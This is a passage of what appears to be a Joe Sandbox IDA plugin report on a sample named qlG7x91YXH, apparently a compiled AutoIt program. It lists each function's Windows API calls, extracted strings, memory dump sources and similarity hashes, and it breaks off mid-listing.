                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00E083F2
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00E0361A,?), ref: 00E0844E
                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E08487
                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00E084CA
                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E08501
                                              • FreeLibrary.KERNEL32(?), ref: 00E0850D
                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E0851D
                                              • DestroyCursor.USER32(?), ref: 00E0852C
                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00E08549
                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00E08555
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Load$Image_wcslen$LibraryMessageSend$CursorDestroyExtractFreeIcon
                                              • String ID: .dll$.exe$.icl
                                              • API String ID: 391920613-1154884017
                                              • Opcode ID: 09183d5f456afbf1a2568c415fee7f03edac27b487e10f99daaa5e6e756384f6
                                              • Instruction ID: 3ccad150b56b8adc451e7cbe350e8cd381eb094d8ee4919089bc2b4c2df15dd9
                                              • Opcode Fuzzy Hash: 09183d5f456afbf1a2568c415fee7f03edac27b487e10f99daaa5e6e756384f6
                                              • Instruction Fuzzy Hash: 8B61EF71500219BEEB14DF64CD85FBE7BA8FB04B21F205609F855E61D1DB74A980CBA0
                                              Function 00D77778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                              • API String ID: 0-1645009161
                                              • Opcode ID: cd7747440f55c17b8824b2064be8e88bdf8295eb6d5e3eef6c35682544ccc178
                                              • Instruction ID: cc6521e06ae7a7ee4acb59bcd80d60fb9184235657e6ad07485f8e3a84f82daf
                                              • Opcode Fuzzy Hash: cd7747440f55c17b8824b2064be8e88bdf8295eb6d5e3eef6c35682544ccc178
                                              • Instruction Fuzzy Hash: 1C812371A04305BBDB25AF64DC92FEE77A8EF15740F088424F809AA186FB71DA51C7B1
                                              Function 00DD5A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadIconW.USER32(00000063), ref: 00DD5A2E
                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00DD5A40
                                              • SetWindowTextW.USER32(?,?), ref: 00DD5A57
                                              • GetDlgItem.USER32(?,000003EA), ref: 00DD5A6C
                                              • SetWindowTextW.USER32(00000000,?), ref: 00DD5A72
                                              • GetDlgItem.USER32(?,000003E9), ref: 00DD5A82
                                              • SetWindowTextW.USER32(00000000,?), ref: 00DD5A88
                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00DD5AA9
                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00DD5AC3
                                              • GetWindowRect.USER32(?,?), ref: 00DD5ACC
                                              • _wcslen.LIBCMT ref: 00DD5B33
                                              • SetWindowTextW.USER32(?,?), ref: 00DD5B6F
                                              • GetDesktopWindow.USER32 ref: 00DD5B75
                                              • GetWindowRect.USER32(00000000), ref: 00DD5B7C
                                              • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00DD5BD3
                                              • GetClientRect.USER32(?,?), ref: 00DD5BE0
                                              • PostMessageW.USER32(?,00000005,00000000,?), ref: 00DD5C05
                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00DD5C2F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                              • String ID:
                                              • API String ID: 895679908-0
                                              • Opcode ID: f8a155c22e6828291776a9aab54d33cfecc22f3a3ca304661743018af7475826
                                              • Instruction ID: 0d0f769794c8ccc2f6c2fccc93025b5ba5e8d9e1d1637ea0cbd7a7b5ad84711e
                                              • Opcode Fuzzy Hash: f8a155c22e6828291776a9aab54d33cfecc22f3a3ca304661743018af7475826
                                              • Instruction Fuzzy Hash: FC717F31900B05AFDB20DFA9DD85B6EBBF5FF48704F14461AE182A26A4D775E944CF20
                                              Function 00DD30F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _wcslen
                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[
                                              • API String ID: 176396367-1901692981
                                              • Opcode ID: e13ac54a0696667b70eb8dae78248df71d01bdd67a69b1eb1b470c048d9db4fb
                                              • Instruction ID: c767b147dda596665041bd388c085769bec3d09b4ba23fdf862f6758321a4fcc
                                              • Opcode Fuzzy Hash: e13ac54a0696667b70eb8dae78248df71d01bdd67a69b1eb1b470c048d9db4fb
                                              • Instruction Fuzzy Hash: D0E19532A00616ABCB189FA8C8556EDFBB4FF54750F58811BE456B7340DB30AE49CBB1
                                              Function 00D900C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                              Download Yara Rule
                                              APIs
                                              • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00D900C6
                                                • Part of subcall function 00D900ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00E4070C,00000FA0,AA1AA412,?,?,?,?,00DB23B3,000000FF), ref: 00D9011C
                                                • Part of subcall function 00D900ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00DB23B3,000000FF), ref: 00D90127
                                                • Part of subcall function 00D900ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00DB23B3,000000FF), ref: 00D90138
                                                • Part of subcall function 00D900ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00D9014E
                                                • Part of subcall function 00D900ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00D9015C
                                                • Part of subcall function 00D900ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00D9016A
                                                • Part of subcall function 00D900ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D90195
                                                • Part of subcall function 00D900ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D901A0
                                              • ___scrt_fastfail.LIBCMT ref: 00D900E7
                                                • Part of subcall function 00D900A3: __onexit.LIBCMT ref: 00D900A9
                                              Strings
                                              • SleepConditionVariableCS, xrefs: 00D90154
                                              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00D90122
                                              • WakeAllConditionVariable, xrefs: 00D90162
                                              • InitializeConditionVariable, xrefs: 00D90148
                                              • kernel32.dll, xrefs: 00D90133
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                              • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                              • API String ID: 66158676-1714406822
                                              • Opcode ID: ff2097f9784a2325894297679504bc6772230e76ce66d28e54b5dc941d2abf49
                                              • Instruction ID: 9e8a14c55f258ddd4d0955eacf98b4bf4ce25400e4d5f363716eee11f6ac01c7
                                              • Opcode Fuzzy Hash: ff2097f9784a2325894297679504bc6772230e76ce66d28e54b5dc941d2abf49
                                              • Instruction Fuzzy Hash: A7210B32A45710AFDB216BA5BC09B6A3BA4DB05F51F14023AF901F36D1DB759C448AB1
                                              Function 00DE44C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                              Download Yara Rule
                                              APIs
                                              • CharLowerBuffW.USER32(00000000,00000000,00E0CC08), ref: 00DE4527
                                              • _wcslen.LIBCMT ref: 00DE453B
                                              • _wcslen.LIBCMT ref: 00DE4599
                                              • _wcslen.LIBCMT ref: 00DE45F4
                                              • _wcslen.LIBCMT ref: 00DE463F
                                              • _wcslen.LIBCMT ref: 00DE46A7
                                                • Part of subcall function 00D8F9F2: _wcslen.LIBCMT ref: 00D8F9FD
                                              • GetDriveTypeW.KERNEL32(?,00E36BF0,00000061), ref: 00DE4743
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _wcslen$BuffCharDriveLowerType
                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                              • API String ID: 2055661098-1000479233
                                              • Opcode ID: a674e0a060a850b82d3d58de5d0e47f7815cc1a21ccb9e27e2c5376febbe3ee9
                                              • Instruction ID: 3b6cc769cdb60d2222536a2545912b3f74d50b93341b2650020f451fbd7b2aa5
                                              • Opcode Fuzzy Hash: a674e0a060a850b82d3d58de5d0e47f7815cc1a21ccb9e27e2c5376febbe3ee9
                                              • Instruction Fuzzy Hash: D1B1D1316083429FC710EF2AC891A6EB7E5EFA5720F54891DF49AD7291E730D845CBB2
                                              Function 00DFAFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _wcslen.LIBCMT ref: 00DFB198
                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DFB1B0
                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DFB1D4
                                              • _wcslen.LIBCMT ref: 00DFB200
                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DFB214
                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DFB236
                                              • _wcslen.LIBCMT ref: 00DFB332
                                                • Part of subcall function 00DE05A7: GetStdHandle.KERNEL32(000000F6), ref: 00DE05C6
                                              • _wcslen.LIBCMT ref: 00DFB34B
                                              • _wcslen.LIBCMT ref: 00DFB366
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DFB3B6
                                              • GetLastError.KERNEL32(00000000), ref: 00DFB407
                                              • CloseHandle.KERNEL32(?), ref: 00DFB439
                                              • CloseHandle.KERNEL32(00000000), ref: 00DFB44A
                                              • CloseHandle.KERNEL32(00000000), ref: 00DFB45C
                                              • CloseHandle.KERNEL32(00000000), ref: 00DFB46E
                                              • CloseHandle.KERNEL32(?), ref: 00DFB4E3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                              • String ID:
                                              • API String ID: 2178637699-0
                                              • Opcode ID: 73034face86faf83f9cee74ef6609d8b84380e0be6757b3c59a757568d4a4b74
                                              • Instruction ID: 578b0f307d6a5bd00f33560d9540fe98f654aaa5546444ae5745e1b0a14608ea
                                              • Opcode Fuzzy Hash: 73034face86faf83f9cee74ef6609d8b84380e0be6757b3c59a757568d4a4b74
                                              • Instruction Fuzzy Hash: 04F17A315042449FC714EF24C891B2ABBE1EF85724F19895EF9999B2A2DB31EC44CB72
                                              Function 00D7326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetMenuItemCount.USER32(00E41990), ref: 00DB2F8D
                                              • GetMenuItemCount.USER32(00E41990), ref: 00DB303D
                                              • GetCursorPos.USER32(?), ref: 00DB3081
                                              • SetForegroundWindow.USER32(00000000), ref: 00DB308A
                                              • TrackPopupMenuEx.USER32(00E41990,00000000,?,00000000,00000000,00000000), ref: 00DB309D
                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00DB30A9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                              • String ID: 0
                                              • API String ID: 36266755-4108050209
                                              • Opcode ID: 46941001d8d7eedbaf96ac54327d43b2d82490d0628a08bd157c0abcfb91d01f
                                              • Instruction ID: 1d3d857678dccc7842f7c31648db2602340d0ba48fd23c06bb31c72821ac4275
                                              • Opcode Fuzzy Hash: 46941001d8d7eedbaf96ac54327d43b2d82490d0628a08bd157c0abcfb91d01f
                                              • Instruction Fuzzy Hash: A271F271640205FEEB219F2ACC49FFABF64FF04364F244206F5296A1E1C7B2A954DB60
                                              Function 00E06CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DestroyWindow.USER32(?,?), ref: 00E06DEB
                                                • Part of subcall function 00D76B57: _wcslen.LIBCMT ref: 00D76B6A
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00E06E5F
                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00E06E81
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E06E94
                                              • DestroyWindow.USER32(?), ref: 00E06EB5
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00D70000,00000000), ref: 00E06EE4
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E06EFD
                                              • GetDesktopWindow.USER32 ref: 00E06F16
                                              • GetWindowRect.USER32(00000000), ref: 00E06F1D
                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E06F35
                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00E06F4D
                                                • Part of subcall function 00D89944: GetWindowLongW.USER32(?,000000EB), ref: 00D89952
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                              • String ID: 0$tooltips_class32
                                              • API String ID: 2429346358-3619404913
                                              • Opcode ID: a05449c7296f3207831183652e21aa2d51d45f3e57dc96c40e05b889b44996f7
                                              • Instruction ID: 3d6286d67e2b132560c1674c895779439fa844deaafd13c5173a88a4d4700121
                                              • Opcode Fuzzy Hash: a05449c7296f3207831183652e21aa2d51d45f3e57dc96c40e05b889b44996f7
                                              • Instruction Fuzzy Hash: 00719C74100341AFDB21CF19DC44FAABBE9FB89708F14051DF689A72A1D771E99ACB12
                                              Function 00DEC476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DEC4B0
                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00DEC4C3
                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00DEC4D7
                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00DEC4F0
                                              • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00DEC533
                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00DEC549
                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DEC554
                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DEC584
                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00DEC5DC
                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00DEC5F0
                                              • InternetCloseHandle.WININET(00000000), ref: 00DEC5FB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                              • String ID:
                                              • API String ID: 3800310941-3916222277
                                              • Opcode ID: cbf77d460b4cbb9d9b70cf25da592048fc7cf4fff7eb10ca34ec8240a608bae1
                                              • Instruction ID: 57394d2f178add36145f2e3ed67be6c4c724181f12a2f8b10ababc7c043d51e4
                                              • Opcode Fuzzy Hash: cbf77d460b4cbb9d9b70cf25da592048fc7cf4fff7eb10ca34ec8240a608bae1
                                              • Instruction Fuzzy Hash: C7519EB0110788BFDB21AF62C948AAB7BFCFF08744F14551AF94596250DB31E949DB70
                                              Function 00E0856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00E08592
                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00E085A2
                                              • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00E085AD
                                              • CloseHandle.KERNEL32(00000000), ref: 00E085BA
                                              • GlobalLock.KERNEL32(00000000), ref: 00E085C8
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00E085D7
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00E085E0
                                              • CloseHandle.KERNEL32(00000000), ref: 00E085E7
                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00E085F8
                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00E0FC38,?), ref: 00E08611
                                              • GlobalFree.KERNEL32(00000000), ref: 00E08621
                                              • GetObjectW.GDI32(?,00000018,000000FF), ref: 00E08641
                                              • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00E08671
                                              • DeleteObject.GDI32(00000000), ref: 00E08699
                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00E086AF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                              • String ID:
                                              • API String ID: 3840717409-0
                                              • Opcode ID: cdf2df8ac72b20792773084263c68dccfd64656618c9d6c073476161807b3e66
                                              • Instruction ID: a0a876359bb63fa409f30028fbb0176dedcc4f33351c35ce0c9e4ba6c9f4d81e
                                              • Opcode Fuzzy Hash: cdf2df8ac72b20792773084263c68dccfd64656618c9d6c073476161807b3e66
                                              • Instruction Fuzzy Hash: EE414C71600204EFDB119FA5DD88EAA7BB8FF89715F108158F945E72A0DB319985CB20
                                              Function 00DE14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VariantInit.OLEAUT32(00000000), ref: 00DE1502
                                              • VariantCopy.OLEAUT32(?,?), ref: 00DE150B
                                              • VariantClear.OLEAUT32(?), ref: 00DE1517
